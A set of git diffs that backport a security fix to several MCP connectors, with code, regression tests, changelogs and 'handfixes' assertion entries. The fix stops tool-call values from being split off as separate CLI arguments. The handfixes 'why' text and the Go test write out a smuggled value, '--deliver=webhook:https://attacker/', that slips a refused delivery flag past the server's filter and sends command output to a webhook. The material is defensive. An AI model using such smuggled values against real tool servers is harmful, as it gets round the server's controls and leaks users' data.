+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/gradient/handfixes.json
+++ b/skills/gradient/handfixes.json
@@ -214,6 +214,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/gradient/handfixes.json
+++ b/skills/gradient/handfixes.json
@@ -229,8 +229,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -240,7 +252,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/halopsa/CHANGELOG.md
+++ b/skills/halopsa/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.15] - 2026-09-01

--- a/skills/halopsa/CHANGELOG.md
+++ b/skills/halopsa/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.2.16]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.2.15] - 2026-09-01
 
 ### Added

--- a/skills/halopsa/CHANGELOG.md
+++ b/skills/halopsa/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.15] - 2026-09-01
 

--- a/skills/halopsa/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/halopsa/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/halopsa/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/halopsa/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/halopsa/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/halopsa/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/halopsa/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/halopsa/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/halopsa/handfixes.json
+++ b/skills/halopsa/handfixes.json
@@ -808,8 +808,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -819,7 +831,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/halopsa/handfixes.json
+++ b/skills/halopsa/handfixes.json
@@ -793,6 +793,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/hubspot/CHANGELOG.md
+++ b/skills/hubspot/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.6]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.5] - 2026-08-26
 
 ### Fixed

--- a/skills/hubspot/CHANGELOG.md
+++ b/skills/hubspot/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.5] - 2026-08-26
 

--- a/skills/hubspot/CHANGELOG.md
+++ b/skills/hubspot/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.5] - 2026-08-26

--- a/skills/hubspot/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/hubspot/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/hubspot/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/hubspot/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/hubspot/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/hubspot/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/hubspot/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/hubspot/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/hubspot/handfixes.json
+++ b/skills/hubspot/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/hubspot/handfixes.json
+++ b/skills/hubspot/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
